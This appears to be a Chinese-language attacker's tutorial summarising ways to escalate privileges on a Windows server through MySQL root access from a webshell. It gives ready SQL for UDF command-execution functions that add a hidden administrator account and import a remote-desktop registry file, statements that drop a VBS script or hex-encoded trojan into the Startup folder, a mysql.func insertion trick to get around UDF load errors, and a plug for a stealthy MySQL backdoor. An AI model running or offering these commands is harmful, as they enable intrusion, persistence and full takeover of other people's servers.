mysql提權(quán)語句歸納如下：

一 UDF提權(quán)

這類提權(quán)方法我想大家已經(jīng)知道了，我大致寫一下，具體語句如下：

create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user iis_user 123!@#abcABC /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:\web\3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);

二 VBS啟動(dòng)項(xiàng)提權(quán)

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動(dòng)\\a.vbs";

先在webshell里連接上數(shù)據(jù)庫(kù),建立表，將VBS寫入表里，然后導(dǎo)入啟動(dòng)項(xiàng)，如果UDF提權(quán)不行的話也可以嘗試下這個(gè)方法，前提是要有ROOT權(quán)限，后面有個(gè),0表示不彈出CMD窗口，安靜的運(yùn)行。

還可以這樣寫:

create table a (cmd BLOB);
insert into a values （CONVERT(木馬的16進(jìn)制代碼,CHAR));
select * from a into dumpfile ’C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\啟動(dòng)\\mm.exe’
drop table a;
執(zhí)行前3條語句，就可以將木馬寫進(jìn)啟動(dòng)里了，前提是木馬一定要是16進(jìn)制，還有就是路徑要是\\，因?yàn)閣indows會(huì)自動(dòng)過濾掉一個(gè)\

三 Linx Mysql BackDoor提權(quán)

Linx Mysql Door

Mysql BackDoor是一款針對(duì)PHP+Mysql服務(wù)器開發(fā)的后門,該后門安裝后為Mysql增加一個(gè)可以執(zhí)行系統(tǒng)命令的"state"函數(shù),并且隨Mysql進(jìn)程啟動(dòng)一個(gè)基于Dll的嗅探型后門,這個(gè)后門在Windows下?lián)碛信cMysql一樣的系統(tǒng)權(quán)限,從而巧妙的實(shí)現(xiàn)了無端口,無進(jìn)程,無服務(wù)的穿墻木馬.

用法：將Mysql.php傳到PHP服務(wù)器上,點(diǎn)擊"自動(dòng)安裝Mysql BackDoor"，然后直接執(zhí)行命令即可
四，MIX.DLL提權(quán)

create table temp_mix(abc longblob);
insert into temp_mix values(load_file(’D:\\web\\udf.dll’));
select * from temp_mix into dumpfile ’C:\\Windows\\system32\\udf.dll’;
create function MyCmd returns string soname ’udf.dll’;
select MyCmd(’net user’);
drop table if exists temp_mix;

前三句主要目的是把DLL放到系統(tǒng)目錄.第4句建立函數(shù).然后就可以執(zhí)行系統(tǒng)命令了。而最容易出問題的就是第4句:can’t open shared library ’udf.dll’(error 2);就說下他.

先前的時(shí)候.有次提權(quán).可以建立函數(shù).也忘了什么原因了.需要重新建下這個(gè)函數(shù).首先百度了下.說得是:drop function MyCmd; 就可以刪到已經(jīng)建立的函數(shù).測(cè)試了下.發(fā)現(xiàn)還是不行.然后繼續(xù)找的時(shí)候.說這是MYSQL的一個(gè)BUG.可以執(zhí)行如下語句:delete from mysql.func where name=’MyCmd’;.測(cè)試了下成功了.前天再次盯著屏幕上的can’t open shared library ’udf.dll’.又看到了這條delete語句.我們知道delete就是刪除.是刪的表里的東西.刪下表就可以刪了函數(shù)了?那反過來.建立函數(shù)是不是就是往表里插入一條新記錄?而且是mysql.func.也就是mysql這個(gè)庫(kù)里的func表.呵呵.看名字也象.測(cè)試一番后.得出如下結(jié)果:

在提權(quán)的時(shí)候.建立函數(shù)顯示can’t open shared library ’udf.dll’.就干脆跳過這句.執(zhí)行另外一句.或者說.把第4句換成:insert into mysql.func values(’MyCmd’,0,’udf.dll’,’function’);.說下func這個(gè)表的結(jié)構(gòu):4列.name,return,dl,fun.第二列和第四列的名字記不大清楚了.但意思一樣.有興趣可以自己select * from func;下就知道了.第一列就是新建函數(shù)的名字.字符串.第二列是返回值.填0.第三列dl指函數(shù)所在的dll名字.字符串類型.這里為我們導(dǎo)到系統(tǒng)目錄里的dll名.不一定是udf.dll.只要跟你導(dǎo)出的一樣就行.第四列作用不清楚.但是填上funciton這個(gè)字符串就能用.應(yīng)該是指這個(gè)是個(gè)函數(shù)吧...因?yàn)檫@只是個(gè)插入操作.所以只要是root.應(yīng)該不會(huì)有錯(cuò)誤的.后面的就一樣了.select MyCmd(’whoami’);.但是別急!這里有個(gè)前提:需要重啟MYSQL..我對(duì)MYSQL不了解.但是重啟后新建的函數(shù)絕對(duì)可用.貌似有別的辦法可以達(dá)到同樣的效果.好象是flush.但是具體flush哪里.就不知道了.不過不是權(quán)限.也不是func表.試過了.而且MYSQL下.搜了很久也沒找到root在MYSQL下通過命令重啟的.

關(guān)健詞：mysql